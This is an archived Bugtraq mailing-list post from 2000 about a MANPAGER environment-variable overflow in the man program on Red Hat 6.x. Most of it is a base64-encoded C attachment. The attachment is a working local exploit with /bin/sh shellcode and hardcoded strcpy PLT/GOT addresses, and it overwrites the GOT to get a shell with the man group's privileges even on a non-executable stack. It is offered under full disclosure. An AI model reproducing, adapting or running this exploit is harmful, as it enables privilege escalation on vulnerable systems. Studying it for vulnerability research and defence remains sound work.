[14694] in bugtraq
Re: man-exploit for MANPAGER environment...
daemon@ATHENA.MIT.EDU (Mariusz Woloszyn)
Wed Apr 26 22:20:49 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="429728448-1351432301-956737726=:19576"
Message-Id: <Pine.LNX.4.04.10004261021470.19576-200000@dzyngiel.ipartners.pl>
Date: Wed, 26 Apr 2000 10:28:46 +0200
Reply-To: Mariusz Woloszyn <emsi@IT.PL>
From: Mariusz Woloszyn <emsi@IT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19033.956566296@www4.gmx.net>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--429728448-1351432301-956737726=:19576
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Content-Transfer-Encoding: QUOTED-PRINTABLE
On Mon, 24 Apr 2000 psychoid@GMX.NET wrote:
> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
>=20
> - snip -
>=20
> /*
> * MAN-Exploit for MANPAGER environmental variable.
> * rh 6.x, tested on rh 6.1
> * written by psychoid/tCl
> * gives egid man.
> *
> * Originally discovered by lcamtuf.
> * educational. yes.
> *
> */
>=20
For absolutely FULL disclosure here is wonderfull man sploit (allready
posted to vuln-dev in thread of sth...) that works cool even if stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details: http://www.securityfocus.com/templates/archi=
ve.pike?list=3D82&date=3D2000-04-15&msg=3DPine.GSO.4.03.10004201510040.1238=
8-100000@zloty.it.com.pl).
GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.
Kil3r / Emsi / M.C.Mar /
--
Mariusz Wo=B3oszyn
Internet Security Specialist, Internet Partners, GTS Poland
--429728448-1351432301-956737726=:19576
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="3man.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.04.10004261028460.19576@dzyngiel.ipartners.pl>
Content-Description:
Content-Disposition: attachment; filename="3man.c"
LyoNCiAqIFJld3JpdGVuIGZyb206DQogKiAoYykgMjAwMCBiYWJjaWEgcGFk
bGluYSAvIGIwZg0KICogKGxjYW10dWYncyBpZGVhKQ0KICogYnkgS2lsM3Ig
b2YgTGFtM3JaDQogKiBmb3Igbm9uZXhlYyBzdGFjayBlbnZpcm9ubWVudA0K
ICogDQogKiByZWRoYXQgNi4xIChhbmQgb3RoZXJzKSAvdXNyL2Jpbi9tYW4g
ZXhwbG9pdA0KKi8NCg0KCWNoYXIgZXhlY3NoZWxsW10gPQ0KCSJceGViXHgx
Zlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4ODlceDQ2
XHgwY1x4YjBceDBiIg0KCSJceDg5XHhmM1x4OGRceDRlXHgwOFx4OGRceDU2
XHgwY1x4Y2RceDgwXHgzMVx4ZGJceDg5XHhkOFx4NDBceGNkIg0KCSJceDgw
XHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0KDQojaW5jbHVkZSA8
c3RkaW8uaD4NCiNpbmNsdWRlIDxzeXMvcGFyYW0uaD4NCiNpbmNsdWRlIDxz
eXMvc3RhdC5oPg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KDQojZGVmaW5lIFNU
UkNQWQkJMHg4MDQ5MGU0CS8vIDw9PSBzdHJjcHkoKSBQTFQgZW50cnkNCiNk
ZWZpbmUJR09UCQkweDgwNTAzOGMJLy8gPD09IHN0cmNweSgpIEdPVCBlbnRy
eQ0KI2RlZmluZSBOT1AJCTB4OTANCiNkZWZpbmUgQlVGU0laRQkJNDAzMysz
OA0KI2RlZmluZSBSRVQJCVNUUkNQWQkJLy8weDQ2NDY0NjQ2DQojZGVmaW5l
IF9CSU5fU0gJCTB4YmZmZmZmZTcgCS8vIDw9PSB3aGVyZSB3ZSBoYXZlICIv
YmluL3NoIiBzdHJpbmcsDQoJCQkJCS8vICAgIGN1cmVudGx5IHVzZWxlc3Mg
OykNCiNkZWZpbmUgU0hFTExDT0RFCTB4YmZmZmZmYzENCg0KbG9uZyBnZXRl
c3Aodm9pZCkNCnsNCiAgIF9fYXNtX18oIm1vdmwgJWVzcCwgJWVheFxuIik7
DQp9DQoNCmludCBtYWluKGFyZ2MsIGFyZ3YpDQppbnQgYXJnYzsNCmNoYXIg
Kiphcmd2Ow0Kew0KCWNoYXIgYnVmW0JVRlNJWkVdLCAqcDsNCgljaGFyICpl
bnZbM107DQoJaW50ICphcDsNCg0KCW1lbXNldChidWYsTk9QLEJVRlNJWkUp
Ow0KDQoJcD1idWYrQlVGU0laRS00Ow0KCWFwPShpbnQgKilwOw0KCSphcCsr
ID1SRVQ7DQoJKmFwKysgPUdPVCs0Ow0KCSphcCsrID1HT1QrNDsNCgkqYXAr
KyA9U0hFTExDT0RFOw0KDQoJZnByaW50ZihzdGRlcnIsICJSRVQ6IDB4JXgg
IFNIRUxMQ09ERTogMHgleCIsIFJFVCwgU0hFTExDT0RFKTsNCg0KCW1lbWNw
eShidWYsIk1BTlBBR0VSPSIsIDkpOw0KCWVudlswXT1idWY7DQovLwllbnZb
MV09Ii9iaW4vc2giOw0KCWVudlsxXT1leGVjc2hlbGw7DQoJZW52WzJdPShj
aGFyICopMDsNCglleGVjbGUoIi91c3IvYmluL21hbiIsICJtYW4iLCAibHMi
LCAwLCBlbnYpOyAvLyB1c2UgZXhlY2xlIHRvIGhhdmUNCgkJCQkvLyBzaGVs
bGNvZGUgYW5kIG90aGVyIHBhcmFtcyBhdCBmaXhlZCBhZGRyISEhDQoNCgly
ZXR1cm4gMDsNCn0NCg==
--429728448-1351432301-956737726=:19576--
